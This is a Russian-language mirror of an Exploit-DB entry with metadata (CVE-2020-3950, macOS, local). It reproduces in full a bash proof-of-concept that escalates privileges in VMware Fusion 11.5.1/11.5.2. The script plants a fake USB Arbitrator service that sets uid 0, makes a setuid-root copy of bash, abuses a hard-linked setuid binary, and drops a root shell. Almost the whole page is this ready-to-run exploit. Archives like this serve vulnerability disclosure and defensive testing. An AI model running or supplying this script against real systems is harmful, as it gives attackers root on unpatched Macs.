- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 48235
- Проверка EDB
-
- Пройдено
- Автор
- RICH MIRCH
- Тип уязвимости
- LOCAL
- Платформа
- MACOS
- CVE
- cve-2020-3950
- Дата публикации
- 2020-03-20
VMware Fusion 11.5.2 - Privilege Escalation
Код:
# Exploit Title: VMware Fusion 11.5.2 - Privilege Escalation
# Date: 2020-03-17
# Exploit Author: Rich Mirch
# Vendor Homepage: https://www.vmware.com/products/fusion.html
# Vendor Advisory: https://www.vmware.com/security/advisories/VMSA-2020-0005.html
# Software Link: https://download3.vmware.com/software/fusion/file/VMware-Fusion-11.5.1-15018442.dmg
# Versions:
# VMware Fusion Professional 11.5.1 (15018442)
# VMware Fusion Professional 11.5.2 (15794494)
#
# Tested on: macOS 10.14.6
# CVE : CVE-2020-3950
# Source PoC: https://raw.githubusercontent.com/mirchr/security-research/master/vulnerabilities/CVE-2020-3950.sh
#
#
#!/bin/bash
echo "CVE-2020-3950 VMware Fusion EoP PoC by @0xm1rch"
mkdir -p ~/a/b/c
mkdir -p ~/Contents/Library/services
cat > ~/Contents/Library/services/VMware\ USB\ Arbitrator\ Service <<EOF
#!/usr/bin/python
import os
os.setuid(0)
os.system("cp /bin/bash $HOME/.woot;chmod 4755 $HOME/.woot");
EOF
chmod 755 ~/Contents/Library/services/VMware\ USB\ Arbitrator\ Service
cd ~/a/b/c
ln "/Applications/VMware Fusion.app/Contents/Library/services/Open VMware USB Arbitrator Service" . 2>/dev/null
"${PWD}/Open VMware USB Arbitrator Service" >/dev/null 2>/dev/null &
p=$!
echo "Sleeping for 5 seconds"
sleep 5
kill ${p?}
wait
echo "Sleeping for 7 seconds"
sleep 7
$HOME/.woot -p
- Источник
- www.exploit-db.com